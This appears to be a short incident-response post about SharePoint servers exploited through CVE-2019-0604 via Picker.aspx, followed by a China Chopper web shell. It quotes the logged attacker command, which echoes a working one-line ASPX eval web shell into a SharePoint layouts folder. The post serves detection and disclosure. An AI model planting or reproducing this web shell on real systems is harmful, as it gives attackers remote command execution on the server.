Over the past week, I started seeing attacks on Sharepoint servers using vulnerability CVE-2019-0604. The Zero Day Initiative has a great write up(1) on the exploit of the vulnerability.
Initial detection of the exploit came from endpoint exploit detection. When reviewing the IIS logs, we saw a post to the Picker.aspx. This appears to be the most common entry point for this attack exploiting CVE-2019-0604.
In the case of this attacker, they dropper a China Chopper payload on the server. China Chopper has been around for a long time. Crowdstrike did a great writeup(2) in 2015. The payload for this is just a one-liner that was echoed into the files via command line.
The anomaly that endpoint detected was a cmd shell spawning by w3wp.exe process.
Parent Process: w3wp.exe
"C:\Windows\System32\cmd.exe" /c echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> >
While the attack appears to be an automated drive-by, the attackers did not come back and do any additional modifications to the server.
User agent string:python-requests/2.18.4
Chopper Files created:
Thanks to my team for the analysis.
May 20th 2019
2 hours ago